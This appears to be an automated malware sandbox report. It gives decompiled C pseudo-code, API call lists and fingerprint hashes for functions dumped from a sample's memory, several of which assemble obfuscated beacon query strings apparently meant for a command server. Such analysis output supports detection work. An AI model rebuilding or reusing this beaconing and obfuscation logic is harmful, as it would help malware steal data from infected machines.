                  • Instruction Fuzzy Hash: B221B373F205394B7B0CC47E8C562BDB6E1C68C601745823AF8A6EA2C1D968D917E2E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E00DCAF34(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebp;
                  				signed int* _t43;
                  				char _t44;
                  				void* _t46;
                  				void* _t49;
                  				intOrPtr* _t53;
                  				void* _t54;
                  				void* _t65;
                  				long _t66;
                  				signed int* _t80;
                  				signed int* _t82;
                  				void* _t84;
                  				signed int _t86;
                  				void* _t89;
                  				void* _t95;
                  				void* _t96;
                  				void* _t99;
                  				void* _t106;
                  
                  				_t43 = _t84;
                  				_t65 = __ebx + 2;
                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                  				_t89 = _t95;
                  				_t96 = _t95 - 8;
                  				_push(_t65);
                  				_push(_t84);
                  				_push(_t89);
                  				asm("cld");
                  				_t66 = _a8;
                  				_t44 = _a4;
                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                  					_push(_t89);
                  					E00DCB09F(_t66 + 0x10, _t66, 0xffffffff);
                  					_t46 = 1;
                  				} else {
                  					_v12 = _t44;
                  					_v8 = _a12;
                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                  					_t86 =  *(_t66 + 0xc);
                  					_t80 =  *(_t66 + 8);
                  					_t49 = E00DCB159(_t66);
                  					_t99 = _t96 + 4;
                  					if(_t49 == 0) {
                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                  						goto L11;
                  					} else {
                  						while(_t86 != 0xffffffff) {
                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                  							if(_t53 == 0) {
                  								L8:
                  								_t80 =  *(_t66 + 8);
                  								_t86 = _t80[_t86 + _t86 * 2];
                  								continue;
                  							} else {
                  								_t54 =  *_t53();
                  								_t89 = _t89;
                  								_t86 = _t86;
                  								_t66 = _a8;
                  								_t55 = _t54;
                  								_t106 = _t54;
                  								if(_t106 == 0) {
                  									goto L8;
                  								} else {
                  									if(_t106 < 0) {
                  										_t46 = 0;
                  									} else {
                  										_t82 =  *(_t66 + 8);
                  										E00DCB044(_t55, _t66);
                  										_t89 = _t66 + 0x10;
                  										E00DCB09F(_t89, _t66, 0);
                  										_t99 = _t99 + 0xc;
                  										E00DCB13B(_t82[2]);
                  										 *(_t66 + 0xc) =  *_t82;
                  										_t66 = 0;
                  										_t86 = 0;
                  										 *(_t82[2])(1);
                  										goto L8;
                  									}
                  								}
                  							}
                  							goto L13;
                  						}
                  						L11:
                  						_t46 = 1;
                  					}
                  				}
                  				L13:
                  				return _t46;
                  			}

                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                  • Instruction ID: 2271dd67437bb47eda5f740704cddab508655e20f7342a0ce91069c7a1ef786b
                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                  • Instruction Fuzzy Hash: 072192729002099BCB14DF68CC81E6BBBA5FF49360B0A816DE9558B245EB30F915CBF1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E702521A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebp;
                  				signed int* _t43;
                  				char _t44;
                  				void* _t46;
                  				void* _t49;
                  				intOrPtr* _t53;
                  				void* _t54;
                  				void* _t65;
                  				long _t66;
                  				signed int* _t80;
                  				signed int* _t82;
                  				void* _t84;
                  				signed int _t86;
                  				void* _t89;
                  				void* _t95;
                  				void* _t96;
                  				void* _t99;
                  				void* _t106;
                  
                  				_t43 = _t84;
                  				_t65 = __ebx + 2;
                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                  				_t89 = _t95;
                  				_t96 = _t95 - 8;
                  				_push(_t65);
                  				_push(_t84);
                  				_push(_t89);
                  				asm("cld");
                  				_t66 = _a8;
                  				_t44 = _a4;
                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                  					_push(_t89);
                  					E7025230B(_t66 + 0x10, _t66, 0xffffffff);
                  					_t46 = 1;
                  				} else {
                  					_v12 = _t44;
                  					_v8 = _a12;
                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                  					_t86 =  *(_t66 + 0xc);
                  					_t80 =  *(_t66 + 8);
                  					_t49 = E702523C5(_t66);
                  					_t99 = _t96 + 4;
                  					if(_t49 == 0) {
                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                  						goto L11;
                  					} else {
                  						while(_t86 != 0xffffffff) {
                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                  							if(_t53 == 0) {
                  								L8:
                  								_t80 =  *(_t66 + 8);
                  								_t86 = _t80[_t86 + _t86 * 2];
                  								continue;
                  							} else {
                  								_t54 =  *_t53();
                  								_t89 = _t89;
                  								_t86 = _t86;
                  								_t66 = _a8;
                  								_t55 = _t54;
                  								_t106 = _t54;
                  								if(_t106 == 0) {
                  									goto L8;
                  								} else {
                  									if(_t106 < 0) {
                  										_t46 = 0;
                  									} else {
                  										_t82 =  *(_t66 + 8);
                  										E702522B0(_t55, _t66);
                  										_t89 = _t66 + 0x10;
                  										E7025230B(_t89, _t66, 0);
                  										_t99 = _t99 + 0xc;
                  										E702523A7(_t82[2], 1);
                  										 *(_t66 + 0xc) =  *_t82;
                  										_t66 = 0;
                  										_t86 = 0;
                  										 *(_t82[2])();
                  										goto L8;
                  									}
                  								}
                  							}
                  							goto L13;
                  						}
                  						L11:
                  						_t46 = 1;
                  					}
                  				}
                  				L13:
                  				return _t46;
                  			}


                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                  • Instruction ID: 0e68ac5032f76e6fd07392cd8bfb3793258a16bf043e1957291e5e19d422dd73
                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                  • Instruction Fuzzy Hash: 6F2156779042059FC711DF64C88196BB7A9BF49350F0581989D56DB185DB30F92DCBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                  • Instruction ID: a2e0bea0542f13559c46079ae6a3fe3058bd8280f8754aec36691c93b9a1c827
                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                  • Instruction Fuzzy Hash: 2C117F733801019FD714CE59DC92FA773AAEB99260B25816AED04CB315E635EC618660
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                  • Instruction ID: 672a7c68b0797cc21157611984522b6acb001691219e7623aabc96c007431a13
                  • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                  • Instruction Fuzzy Hash: CD01F1333142418FD705CF28E984F6EBBE8EBE1630B15817FC4478761AEA34E849CA20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3db8a7d315115b2d6318304225e3ffa6f11223c6673e9702cf92d62bb76cb36b
                  • Instruction ID: 6d7b6ca17d5adf41fca893a259fd38d1833a438a193bc54cdef843a05d3a7bb5
                  • Opcode Fuzzy Hash: 3db8a7d315115b2d6318304225e3ffa6f11223c6673e9702cf92d62bb76cb36b
                  • Instruction Fuzzy Hash: 71F096B36543209BC7128EAC8589B8D73ACFB0E710F11415AEB02E7650CAF4DE20C7C0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 271f4ca6efd379e4f7d25fc59c1364ea2ed4ed1117ea8fead28d502adf8df95b
                  • Instruction ID: 0ea87aff7e053e2a330e47de69359a5e7392081d344018c306045915053a1240
                  • Opcode Fuzzy Hash: 271f4ca6efd379e4f7d25fc59c1364ea2ed4ed1117ea8fead28d502adf8df95b
                  • Instruction Fuzzy Hash: C8F01C736102649FCB128A888849B8E72A8EB49B90F154056EA05E7250C6B4EE50DB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bde975d9ee91e19d349fea5adaa53b7bc152eca7a19d5459ed097e285133e890
                  • Instruction ID: 39e765de9a71a402cda4fc98f5e56367201992cccd1fdab93a77d6ba5bd77d99
                  • Opcode Fuzzy Hash: bde975d9ee91e19d349fea5adaa53b7bc152eca7a19d5459ed097e285133e890
                  • Instruction Fuzzy Hash: 88E08673911168EBC710CBD8C54498DF3FCF748B40B11045AB902D3110C670DE04CBD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00DC6A9C(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                  				intOrPtr _v4;
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v24;
                  				intOrPtr _v40;
                  				void* __ecx;
                  				void* __edi;
                  				intOrPtr _t31;
                  				intOrPtr _t32;
                  				intOrPtr _t33;
                  				intOrPtr _t34;
                  				intOrPtr _t35;
                  				void* _t38;
                  				intOrPtr _t39;
                  				int _t42;
                  				void* _t43;
                  				intOrPtr _t44;
                  				intOrPtr _t48;
                  				intOrPtr _t52;
                  				intOrPtr _t55;
                  				intOrPtr _t56;
                  				intOrPtr _t62;
                  				intOrPtr _t66;
                  				intOrPtr* _t68;
                  				intOrPtr _t78;
                  				intOrPtr _t81;
                  				intOrPtr _t84;
                  				int _t87;
                  				intOrPtr _t88;
                  				int _t91;
                  				intOrPtr _t92;
                  				int _t95;
                  				void* _t98;
                  				void* _t99;
                  				void* _t103;
                  				intOrPtr _t105;
                  				long _t107;
                  				intOrPtr _t108;
                  				intOrPtr* _t109;
                  				long _t110;
                  				int _t111;
                  				void* _t112;
                  				void* _t113;
                  				void* _t114;
                  				void* _t115;
                  				void* _t117;
                  				void* _t118;
                  				void* _t120;
                  				void* _t121;
                  
                  				_t103 = __edx;
                  				_t110 = __eax;
                  				_v8 = 8;
                  				_t117 = RtlAllocateHeap( *0xdcd1f0, 0, 0x800);
                  				if(_t117 != 0) {
                  					if(_t110 == 0) {
                  						_t110 = GetTickCount();
                  					}
                  					_t31 =  *0xdcd018; // 0xb111e430
                  					asm("bswap eax");
                  					_t32 =  *0xdcd014; // 0x5cb11ae7
                  					asm("bswap eax");
                  					_t33 =  *0xdcd010; // 0x15dc9586
                  					asm("bswap eax");
                  					_t34 =  *0xdcd00c; // 0x8e03bf7
                  					asm("bswap eax");
                  					_t35 =  *0xdcd230; // 0x434a5a8
                  					_t2 = _t35 + 0xdce622; // 0x74666f73
                  					_t111 = wsprintfA(_t117, _t2, 2, 0x3d144, _t34, _t33, _t32, _t31,  *0xdcd02c,  *0xdcd004, _t110);
                  					_t38 = E00DC7C34();
                  					_t39 =  *0xdcd230; // 0x434a5a8
                  					_t3 = _t39 + 0xdce662; // 0x74707526
                  					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                  					_t120 = _t118 + 0x38;
                  					_t112 = _t111 + _t42;
                  					if(_a12 != 0) {
                  						_t92 =  *0xdcd230; // 0x434a5a8
                  						_t7 = _t92 + 0xdce66d; // 0x732526
                  						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                  						_t120 = _t120 + 0xc;
                  						_t112 = _t112 + _t95;
                  					}
                  					_t43 = E00DC5728(_t99);
                  					_t44 =  *0xdcd230; // 0x434a5a8
                  					_t9 = _t44 + 0xdce38a; // 0x6d697426
                  					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                  					_t48 =  *0xdcd230; // 0x434a5a8
                  					_t11 = _t48 + 0xdce33b; // 0x74636126
                  					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                  					_t52 =  *0xdcd288; // 0x51195b0
                  					_t121 = _t120 + 0x1c;
                  					if(_t52 != 0) {
                  						_t88 =  *0xdcd230; // 0x434a5a8
                  						_t13 = _t88 + 0xdce685; // 0x73797326
                  						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                  						_t121 = _t121 + 0xc;
                  						_t114 = _t114 + _t91;
                  					}
                  					_t105 =  *0xdcd2dc; // 0x5119630
                  					_a28 = E00DC8A9B(0xdcd00a, _t105 + 4);
                  					_t55 =  *0xdcd278; // 0x51195e0
                  					_t107 = 0;
                  					if(_t55 != 0) {
                  						_t84 =  *0xdcd230; // 0x434a5a8
                  						_t16 = _t84 + 0xdce8ea; // 0x3d736f26
                  						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                  						_t121 = _t121 + 0xc;
                  						_t114 = _t114 + _t87;
                  					}
                  					_t56 =  *0xdcd274; // 0x0
                  					if(_t56 != _t107) {
                  						_t81 =  *0xdcd230; // 0x434a5a8
                  						_t18 = _t81 + 0xdce8c1; // 0x3d706926
                  						wsprintfA(_t114 + _t117, _t18, _t56);
                  					}
                  					if(_a28 != _t107) {
                  						_t98 = RtlAllocateHeap( *0xdcd1f0, _t107, 0x800);
                  						if(_t98 != _t107) {
                  							E00DC7C61(GetTickCount());
                  							_t62 =  *0xdcd2dc; // 0x5119630
                  							__imp__(_t62 + 0x40);
                  							asm("lock xadd [eax], ecx");
                  							_t66 =  *0xdcd2dc; // 0x5119630
                  							__imp__(_t66 + 0x40);
                  							_t68 =  *0xdcd2dc; // 0x5119630
                  							_t115 = E00DC140D(1, _t103, _t117,  *_t68);
                  							asm("lock xadd [eax], ecx");
                  							if(_t115 != _t107) {
                  								StrTrimA(_t115, 0xdcc2c4);
                  								_push(_t115);
                  								_t108 = E00DC74AF();
                  								_v4 = _t108;
                  								if(_t108 != 0) {
                  									 *_t115 = 0;
                  									__imp__(_t98, _a8);
                  									_t109 = __imp__;
                  									 *_t109(_t98, _t108);
                  									 *_t109(_t98, _t115);
                  									_t78 = E00DC4644(0xffffffffffffffff, _t98, _v12, _v8);
                  									_v40 = _t78;
                  									if(_t78 != 0 && _t78 != 0x10d2) {
                  										E00DC53A8();
                  									}
                  									HeapFree( *0xdcd1f0, 0, _v24);
                  								}
                  								HeapFree( *0xdcd1f0, 0, _t115);
                  								_t107 = 0;
                  							}
                  							HeapFree( *0xdcd1f0, _t107, _t98);
                  						}
                  						HeapFree( *0xdcd1f0, _t107, _a20);
                  					}
                  					HeapFree( *0xdcd1f0, _t107, _t117);
                  				}
                  				return _v16;
                  			}


                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00DC6ABA
                  • GetTickCount.KERNEL32 ref: 00DC6ACE
                  • wsprintfA.USER32 ref: 00DC6B1D
                  • wsprintfA.USER32 ref: 00DC6B3A
                  • wsprintfA.USER32 ref: 00DC6B5B
                  • wsprintfA.USER32 ref: 00DC6B79
                  • wsprintfA.USER32 ref: 00DC6B8E
                  • wsprintfA.USER32 ref: 00DC6BAF
                  • wsprintfA.USER32 ref: 00DC6BE9
                  • wsprintfA.USER32 ref: 00DC6C09
                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DC6C24
                  • GetTickCount.KERNEL32 ref: 00DC6C34
                  • RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC6C48
                  • RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC6C66
                    • Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1438
                    • Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1440
                    • Part of subcall function 00DC140D: strcpy.NTDLL ref: 00DC1457
                    • Part of subcall function 00DC140D: lstrcat.KERNEL32(00000000,00000000), ref: 00DC1462
                    • Part of subcall function 00DC140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DC147F
                  • StrTrimA.SHLWAPI(00000000,00DCC2C4,00000000,05119630), ref: 00DC6C94
                    • Part of subcall function 00DC74AF: lstrlen.KERNEL32(0511887A,00000000,00000000,00000000,00DC6CA0,00000000), ref: 00DC74BF
                    • Part of subcall function 00DC74AF: lstrlen.KERNEL32(?), ref: 00DC74C7
                    • Part of subcall function 00DC74AF: lstrcpy.KERNEL32(00000000,0511887A), ref: 00DC74DB
                    • Part of subcall function 00DC74AF: lstrcat.KERNEL32(00000000,?), ref: 00DC74E6
                  • lstrcpy.KERNEL32(00000000,?), ref: 00DC6CB2
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00DC6CC0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00DC6CC4
                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00DC6CF4
                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DC6D03
                  • HeapFree.KERNEL32(00000000,00000000,00000000,05119630), ref: 00DC6D13
                  • HeapFree.KERNEL32(00000000,?), ref: 00DC6D24
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00DC6D32
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                  • String ID:
                  • API String ID: 1837416118-0
                  • Opcode ID: 8abafe99f52e273ba5b44d7a9c3f733b15a4ad7cbb5b2eb4453515fcc86d346a
                  • Instruction ID: c6822061859f8519c988e58aaa0187d7fb11674af99d721ae3898940831bbe4c
                  • Opcode Fuzzy Hash: 8abafe99f52e273ba5b44d7a9c3f733b15a4ad7cbb5b2eb4453515fcc86d346a
                  • Instruction Fuzzy Hash: A6714D72510707EFC721DB68DC88E56B7EEFB88314B190929F949C7320E635E905AB74
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E00DC3CC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* __ebx;
                  				void* __edi;
                  				long _t62;
                  				intOrPtr _t63;
                  				intOrPtr _t64;
                  				intOrPtr _t65;
                  				intOrPtr _t66;
                  				intOrPtr _t67;
                  				void* _t70;
                  				intOrPtr _t71;
                  				int _t74;
                  				void* _t75;
                  				intOrPtr _t76;
                  				int _t79;
                  				intOrPtr _t82;
                  				intOrPtr _t86;
                  				intOrPtr _t87;
                  				void* _t89;
                  				void* _t92;
                  				intOrPtr _t96;
                  				intOrPtr _t100;
                  				intOrPtr* _t102;
                  				void* _t108;
                  				intOrPtr _t113;
                  				signed int _t117;
                  				char** _t119;
                  				int _t122;
                  				intOrPtr* _t125;
                  				intOrPtr* _t127;
                  				intOrPtr* _t129;
                  				intOrPtr* _t131;
                  				intOrPtr _t134;
                  				intOrPtr _t137;
                  				int _t140;
                  				intOrPtr _t141;
                  				int _t144;
                  				void* _t145;
                  				void* _t146;
                  				intOrPtr _t147;
                  				void* _t156;
                  				int _t157;
                  				void* _t158;
                  				void* _t159;
                  				void* _t160;
                  				intOrPtr _t161;
                  				void* _t163;
                  				long _t167;
                  				intOrPtr* _t168;
                  				intOrPtr* _t171;
                  				void* _t172;
                  				void* _t174;
                  				void* _t175;
                  				void* _t180;
                  
                  				_t156 = __edx;
                  				_t146 = __ecx;
                  				_t62 = __eax;
                  				_t145 = _a20;
                  				_a20 = 8;
                  				if(__eax == 0) {
                  					_t62 = GetTickCount();
                  				}
                  				_t63 =  *0xdcd018; // 0xb111e430
                  				asm("bswap eax");
                  				_t64 =  *0xdcd014; // 0x5cb11ae7
                  				asm("bswap eax");
                  				_t65 =  *0xdcd010; // 0x15dc9586
                  				asm("bswap eax");
                  				_t66 =  *0xdcd00c; // 0x8e03bf7
                  				asm("bswap eax");
                  				_t67 =  *0xdcd230; // 0x434a5a8
                  				_t3 = _t67 + 0xdce622; // 0x74666f73
                  				_t157 = wsprintfA(_t145, _t3, 3, 0x3d144, _t66, _t65, _t64, _t63,  *0xdcd02c,  *0xdcd004, _t62);
                  				_t70 = E00DC7C34();
                  				_t71 =  *0xdcd230; // 0x434a5a8
                  				_t4 = _t71 + 0xdce662; // 0x74707526
                  				_t74 = wsprintfA(_t157 + _t145, _t4, _t70);
                  				_t174 = _t172 + 0x38;
                  				_t158 = _t157 + _t74;
                  				if(_a8 != 0) {
                  					_t141 =  *0xdcd230; // 0x434a5a8
                  					_t8 = _t141 + 0xdce66d; // 0x732526
                  					_t144 = wsprintfA(_t158 + _t145, _t8, _a8);
                  					_t174 = _t174 + 0xc;
                  					_t158 = _t158 + _t144;
                  				}
                  				_t75 = E00DC5728(_t146);
                  				_t76 =  *0xdcd230; // 0x434a5a8
                  				_t10 = _t76 + 0xdce38a; // 0x6d697426
                  				_t79 = wsprintfA(_t158 + _t145, _t10, _t75, _t156);
                  				_t147 = _a4;
                  				_t159 = _t158 + _t79;
                  				_t180 = _t147 -  *0xdcd2f0; // 0x0
                  				_t82 =  *0xdcd230; // 0x434a5a8
                  				_t15 = _t82 + 0xdce33b; // 0x74636126
                  				_t160 = _t159 + wsprintfA(_t159 + _t145, _t15, 0 | _t180 == 0x00000000);
                  				_t86 =  *0xdcd278; // 0x51195e0
                  				_t175 = _t174 + 0x1c;
                  				if(_t86 != 0) {
                  					_t137 =  *0xdcd230; // 0x434a5a8
                  					_t17 = _t137 + 0xdce8ea; // 0x3d736f26
                  					_t140 = wsprintfA(_t160 + _t145, _t17, _t86);
                  					_t175 = _t175 + 0xc;
                  					_t160 = _t160 + _t140;
                  				}
                  				_t87 =  *0xdcd288; // 0x51195b0
                  				if(_t87 != 0) {
                  					_t134 =  *0xdcd230; // 0x434a5a8
                  					_t19 = _t134 + 0xdce685; // 0x73797326
                  					wsprintfA(_t160 + _t145, _t19, _t87);
                  					_t175 = _t175 + 0xc;
                  				}
                  				_t161 =  *0xdcd2dc; // 0x5119630
                  				_t89 = E00DC8A9B(0xdcd00a, _t161 + 4);
                  				_t167 = 0;
                  				_v12 = _t89;
                  				if(_t89 == 0) {
                  					L28:
                  					HeapFree( *0xdcd1f0, _t167, _t145);
                  					return _a20;
                  				} else {
                  					_t92 = RtlAllocateHeap( *0xdcd1f0, 0, 0x800);
                  					_a8 = _t92;
                  					if(_t92 == 0) {
                  						L27:
                  						HeapFree( *0xdcd1f0, _t167, _v12);
                  						goto L28;
                  					}
                  					E00DC7C61(GetTickCount());
                  					_t96 =  *0xdcd2dc; // 0x5119630
                  					__imp__(_t96 + 0x40);
                  					asm("lock xadd [eax], ecx");
                  					_t100 =  *0xdcd2dc; // 0x5119630
                  					__imp__(_t100 + 0x40);
                  					_t102 =  *0xdcd2dc; // 0x5119630
                  					_t163 = E00DC140D(1, _t156, _t145,  *_t102);
                  					_v20 = _t163;
                  					asm("lock xadd [eax], ecx");
                  					if(_t163 == 0) {
                  						L26:
                  						HeapFree( *0xdcd1f0, _t167, _a8);
                  						goto L27;
                  					}
                  					StrTrimA(_t163, 0xdcc2c4);
                  					_push(_t163);
                  					_t108 = E00DC74AF();
                  					_v8 = _t108;
                  					if(_t108 == 0) {
                  						L25:
                  						HeapFree( *0xdcd1f0, _t167, _t163);
                  						goto L26;
                  					}
                  					 *_t163 = 0;
                  					__imp__(_a8, _v12);
                  					_t168 = __imp__;
                  					 *_t168(_a8, _v8);
                  					 *_t168(_a8, _t163);
                  					_t113 = E00DC745D(0, _a8);
                  					_a4 = _t113;
                  					if(_t113 == 0) {
                  						_a20 = 8;
                  						L23:
                  						E00DC53A8();
                  						L24:
                  						HeapFree( *0xdcd1f0, 0, _v8);
                  						_t167 = 0;
                  						goto L25;
                  					}
                  					_t117 = E00DC6F41(_t145, 0xffffffffffffffff, _t163,  &_v16);
                  					_a20 = _t117;
                  					if(_t117 == 0) {
                  						_t171 = _v16;
                  						_a20 = E00DC492B(_t171, _a4, _a12, _a16);
                  						_t125 =  *((intOrPtr*)(_t171 + 8));
                  						 *((intOrPtr*)( *_t125 + 0x80))(_t125);
                  						_t127 =  *((intOrPtr*)(_t171 + 8));
                  						 *((intOrPtr*)( *_t127 + 8))(_t127);
                  						_t129 =  *((intOrPtr*)(_t171 + 4));
                  						 *((intOrPtr*)( *_t129 + 8))(_t129);
                  						_t131 =  *_t171;
                  						 *((intOrPtr*)( *_t131 + 8))(_t131);
                  						E00DC4C31(_t171);
                  					}
                  					if(_a20 != 0x10d2) {
                  						L18:
                  						if(_a20 == 0) {
                  							_t119 = _a12;
                  							if(_t119 != 0) {
                  								_t164 =  *_t119;
                  								_t169 =  *_a16;
                  								wcstombs( *_t119,  *_t119,  *_a16);
                  								_t122 = E00DC1000(_t164, _t164, _t169 >> 1);
                  								_t163 = _v20;
                  								 *_a16 = _t122;
                  							}
                  						}
                  						goto L21;
                  					} else {
                  						if(_a12 != 0) {
                  							L21:
                  							E00DC4C31(_a4);
                  							if(_a20 == 0 || _a20 == 0x10d2) {
                  								goto L24;
                  							} else {
                  								goto L23;
                  							}
                  						}
                  						_a20 = _a20 & 0x00000000;
                  						goto L18;
                  					}
                  				}
                  			}

                  APIs
                  • GetTickCount.KERNEL32 ref: 00DC3CDB
                  • wsprintfA.USER32 ref: 00DC3D28
                  • wsprintfA.USER32 ref: 00DC3D45
                  • wsprintfA.USER32 ref: 00DC3D65
                  • wsprintfA.USER32 ref: 00DC3D83
                  • wsprintfA.USER32 ref: 00DC3DA6
                  • wsprintfA.USER32 ref: 00DC3DC7
                  • wsprintfA.USER32 ref: 00DC3DE7
                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DC3E18
                  • GetTickCount.KERNEL32 ref: 00DC3E29
                  • RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC3E3D
                  • RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC3E5B
                    • Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1438
                    • Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1440
                    • Part of subcall function 00DC140D: strcpy.NTDLL ref: 00DC1457
                    • Part of subcall function 00DC140D: lstrcat.KERNEL32(00000000,00000000), ref: 00DC1462
                    • Part of subcall function 00DC140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DC147F
                  • StrTrimA.SHLWAPI(00000000,00DCC2C4,?,05119630), ref: 00DC3E90
                    • Part of subcall function 00DC74AF: lstrlen.KERNEL32(0511887A,00000000,00000000,00000000,00DC6CA0,00000000), ref: 00DC74BF
                    • Part of subcall function 00DC74AF: lstrlen.KERNEL32(?), ref: 00DC74C7
                    • Part of subcall function 00DC74AF: lstrcpy.KERNEL32(00000000,0511887A), ref: 00DC74DB
                    • Part of subcall function 00DC74AF: lstrcat.KERNEL32(00000000,?), ref: 00DC74E6
                  • lstrcpy.KERNEL32(00000000,?), ref: 00DC3EB0
